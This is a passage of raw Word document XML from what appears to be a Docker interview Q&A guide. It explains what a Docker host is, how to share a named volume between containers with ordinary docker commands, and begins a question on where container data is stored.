          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="836" w:name="_Toc196308316"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the host in this case</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="836"/>
    </w:p>
    <w:p w14:paraId="2B0B9BC1" w14:textId="2AA2D70B" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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 xml:space="preserve">In Docker terminology, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> refers to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>physical machine or virtual machine</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on which Docker is installed and running containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7762FC13" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00000000" w:rsidP="00127E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3D6B9DE">
          <v:rect id="_x0000_i3375" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6D5140"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>💡</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD2D0E7"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Let’s say you have two Linux servers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A500CB"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Host A</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (IP: 192.168.1.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321C1B2D"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Host B</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (IP: 192.168.1.20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4B665C"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Each host has Docker installed, and you’re running containers on them:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A2DB09"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Container A1</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> runs on </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Host A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B9B107"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Container B1</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> runs on </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Host B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC91B54" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00000000" w:rsidP="00127E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A55BE1">
          <v:rect id="_x0000_i3376" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="342A51CA"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> So in this case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56908387"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 xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>machine</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> running the container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0112C763"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 xml:space="preserve">Docker containers are </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>isolated processes</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside the host but rely on the host's kernel and network configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4877BF50" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00000000" w:rsidP="00127E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5C2A59A">
          <v:rect id="_x0000_i3377" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F32932"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Visual Representation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F802CE4"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Host A (192.168.1.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23471CD8"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 Docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2A413D"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 xml:space="preserve">    └── Container A1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4215B8E5" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56630D38"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Host B (192.168.1.20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FF09FE"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 Docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432F1749"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 xml:space="preserve">    └── Container B1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009D2656"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If Container A1 needs to talk to B1 (e.g., via HTTP), it must go through:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D46A6A"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Host B’s IP + exposed port of Container B1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B032EB1"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 xml:space="preserve">Or use </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>overlay network</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if both hosts are in Docker Swarm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A5D855" w14:textId="67046282" w:rsidR="00145166" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0014516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2E71B05">
          <v:rect id="_x0000_i3378" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F05DAAD" w14:textId="45353774" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="00B743D0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="837" w:name="_Toc196308317"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Imagine you have one volume and you want to share it with multiple containers? How will you do it</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="837"/>
    </w:p>
    <w:p w14:paraId="16A565DC" w14:textId="4C0DA6F9" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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 xml:space="preserve">To </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>share a single Docker volume across multiple containers</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mount the same volume</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> into each container during creation. This allows all containers to </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read/write to the same storage</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62415AF9" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00000000" w:rsidP="00127E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9484F82">
          <v:rect id="_x0000_i3379" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="004BE930"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3D8B09"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Theme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. Create a named volume:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030BC5BF"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docker volume create shared-data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ADDA6B"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Theme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. Run multiple containers using the same volume:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A13742"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docker run -d --name container1 -v shared-data:/app/data busybox tail -f /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D19740"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docker run -d --name container2 -v shared-data:/app/data busybox tail -f /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA4358A"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Both container1 and container2 now share the same volume mounted at /app/data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A6A6F5" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00000000" w:rsidP="00127E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61F1973">
          <v:rect id="_x0000_i3380" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="555FC4D8"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Notes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560F6304"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Changes</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> made by one container are </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>visible</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27567469"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 xml:space="preserve">Useful for sharing </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>logs</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>configs</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>uploads</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABC9F76"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 xml:space="preserve">Ensure </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>concurrent access</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is managed at the application level (especially for write-heavy operations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DA9A6C" w14:textId="399CD316" w:rsidR="00145166" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0014516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AC318D7">
          <v:rect id="_x0000_i3381" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A820843" w14:textId="559D4AF8" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="006344A5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="838" w:name="_Toc196308318"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Where does an object get stored when created inside a docker container</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="838"/>
    </w:p>
    <w:p w14:paraId="0CE8B67D" w14:textId="7819430E" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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 xml:space="preserve">When an object (like a file or data) is created </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>inside a Docker container</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
